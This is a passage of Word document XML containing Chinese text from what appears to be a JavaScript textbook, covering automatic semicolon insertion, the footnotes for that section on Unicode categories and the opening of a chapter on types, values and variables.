      </w:r>
      <w:r>
        <w:t>一行，通常可以省略语句之间的分号（程序结尾或右花括号</w:t>
      </w:r>
      <w:r>
        <w:t>“}”</w:t>
      </w:r>
      <w:r>
        <w:t>之前的分号也可以省略）。许多</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员（包括本书中的示例代码）使用分号来明确标记语句的结束，即使在并不完全需要分号的时候也是如此。另一种风格就是，在任何可以省略分号的地方都将其省略，只有在不得不用的时候才使用分号。不管采用哪种编程风格，关于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中可选分号的问题有几个细节需要注意。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>考虑如下代码，因为两条语句用两行书写，第一个分号是可以省略掉的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b=4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果按照如下格式书写，第一个分号则不能省略掉：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=3;b=4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并不是在所有换行处都填补分号：只有在缺少了分号就无法正确解析代码的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>才会填补分号。换句话讲（类似下面代码中的两处异常），如果当前语句和随后的非空格字符不能当成一个整体来解析的话，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>就在当前语句行结束处填补分号。看一下如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将其解析为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a;a=3;console.log(a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>给第一行换行处添加了</w:t>
      </w:r>
      <w:r>
        <w:t>分号，因为如果没有分号，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>就无法解析代码</w:t>
      </w:r>
      <w:r>
        <w:t>var a a</w:t>
      </w:r>
      <w:r>
        <w:t>。第二个</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>可以单独当做一条语句</w:t>
      </w:r>
      <w:r>
        <w:t>"a;"</w:t>
      </w:r>
      <w:r>
        <w:t>，但</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并没有给第二行结尾填补分号，因为它可以和第三行内容一起解析成</w:t>
      </w:r>
      <w:r>
        <w:t>“a=3;”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些语句的分隔规则会导致一些意想不到的情形，这段代码写成了两行，看起来是两条独立的语句：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=x+f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(a+b).toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但第二行的圆括号却和第一行的</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>组成了一个函数调用，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会把这段代码看做：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=x+f(a+b).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>而这段代码的本意并不是这样。为了能让上述代码解析为两条不同的语句，必须手动填写行尾的显式分号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常来讲，如果一条语句以</w:t>
      </w:r>
      <w:r>
        <w:t>“(”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“[”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>开始，那么它极有可能和前一条语句合在一起解析。以</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>开始的语句并不常见，而以</w:t>
      </w:r>
      <w:r>
        <w:t>“(”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“[”</w:t>
      </w:r>
      <w:r>
        <w:t>开始的语句则非常常见，至少在一些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编码风格中是很普遍的。有些程序员喜欢保守地在语句前加上一个分号，这样哪怕之前的语句被修改了、分号被误删除了，当前语句还是会正确地解析：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=0//</w:t>
      </w:r>
      <w:r>
        <w:t>这里省略了分号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>;[x,x+1,x+2</w:t>
      </w:r>
      <w:r>
        <w:t>].forEach(console.log)//</w:t>
      </w:r>
      <w:r>
        <w:t>前面的分号保证了正确地语句解析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前语句和下一行语句无法合并解析，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>则在第一行后填补分号，这是通用规则，但有两个例外。第一个例外是在涉及</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>语句（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章）的场景中。如果这三个关键字后紧跟着换行，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>则会在换行处填补分号。例如，这段代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会解析成：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return;true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>而代码的本意是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>也就是说，在</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>break</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>continue</w:t>
      </w:r>
      <w:r>
        <w:t>和随后的表达式之间不能有换行。如果添加了换行，程序则只有在极特殊的情况下才会报错，而且程序的调试非常不方便。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第二个例外是在涉及</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“——”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.8</w:t>
      </w:r>
      <w:r>
        <w:t>节）的时候。这些运算符可以作为表达式的前缀，也可以当做表达式的后缀。如果将其用做后缀表达式，它和表达式应当在同一行。否则，行尾将填补分号，同时</w:t>
      </w:r>
      <w:r>
        <w:t>“++”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“——”</w:t>
      </w:r>
      <w:r>
        <w:t>将会作为下一行代码的前缀操作符并与之一起解析，例如，这段代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>++</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这段代码将解析为</w:t>
      </w:r>
      <w:r>
        <w:t>"x;++y"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"x++;y"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>严格讲</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>是区分大小写的，但由于浏览器有着非常较强大的纠错能力，即使文档中包含很多不严格的大小写，浏览器还是比较</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>宽容</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>地正确解析渲染。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>请参照</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Token</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>对其所有字符做了分类，这种分类使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>通用类别值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>表示，这里的</w:t>
      </w:r>
      <w:r>
        <w:t>"Zs"</w:t>
      </w:r>
      <w:r>
        <w:t>既是其中一种类别值，特指没有标志符号但不属于控制或格式字符的空格字符。更多类别值的描述请参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.unicode.org/reports/tr44/</w:t>
      </w:r>
      <w:r>
        <w:t>中关于</w:t>
      </w:r>
      <w:r>
        <w:t>General Category Values</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>Cf</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>中的一种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>通用类别值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，指代那些影响文本布局或文本处理操作但通常不会呈现的格式字符。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>从右至左书写标记</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>RIGHT-TO-LEFT MARK</w:t>
      </w:r>
      <w:r>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>从左至右书写标记</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>LEFT-TO-RIGHT MARK</w:t>
      </w:r>
      <w:r>
        <w:t>）均属于双向字符集语言，字符是带有方向的，比如在阿拉伯语言中，标点位于单词的左侧，而不是我们通常熟悉的右侧。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>ZERO WIDTH(NON-)JOINER</w:t>
      </w:r>
      <w:r>
        <w:t>，零宽</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>非</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>连接符，指没有宽度的不可见连接符，在蒙文、满文、锡伯文等少数民族语言中会使用到。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>对其所有字符做了分类，这种分类使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>通用类别值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>表示，这里的</w:t>
      </w:r>
      <w:r>
        <w:t>"Mn"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Mc"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"Pc"</w:t>
      </w:r>
      <w:r>
        <w:t>就是其中三种类别值，</w:t>
      </w:r>
      <w:r>
        <w:t>Mn</w:t>
      </w:r>
      <w:r>
        <w:t>表示基</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>字符的修改中出现的非间距字符，</w:t>
      </w:r>
      <w:r>
        <w:t>Mc</w:t>
      </w:r>
      <w:r>
        <w:t>表示基字符的修改中影响了基字符标志位的宽度的</w:t>
      </w:r>
      <w:r>
        <w:t>间距字符，</w:t>
      </w:r>
      <w:r>
        <w:t>Pc</w:t>
      </w:r>
      <w:r>
        <w:t>指连接两个字符的连接符或标点符号。更多类别值的描述请参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.unicode.org/reports/tr44/</w:t>
      </w:r>
      <w:r>
        <w:t>中关于</w:t>
      </w:r>
      <w:r>
        <w:t>General Category Values</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="Di_3Zhang__Lei_Xing___Zhi_He_Bian_Liang_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章　类型、值和变量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算机程序的运行需要对值（</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>）（比如数字</w:t>
      </w:r>
      <w:r>
        <w:t>3.14</w:t>
      </w:r>
      <w:r>
        <w:t>或文本</w:t>
      </w:r>
      <w:r>
        <w:t>"hello world"</w:t>
      </w:r>
      <w:r>
        <w:t>）进行操作。在编程语言中，能够表示并操作的值的类型称做数据类型（</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>），编程语言最基本的特性就是能够支持多种数据类型。当程序需要将值保存起来以备将来使用时，便将其赋值给（将值</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>保存</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到）一个</w:t>
      </w:r>
      <w:r>
        <w:t>变量（</w:t>
      </w:r>
      <w:r>
        <w:t>variable</w:t>
      </w:r>
      <w:r>
        <w:t>）。变量是一个值的符号名称，可以通过名称来获得对值的引用。变量的工作机制是编程语言的另一个基本特性。本章将详细讲解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的类型、值和变量。这里的引言只做概述，你可以通过参照</w:t>
      </w:r>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
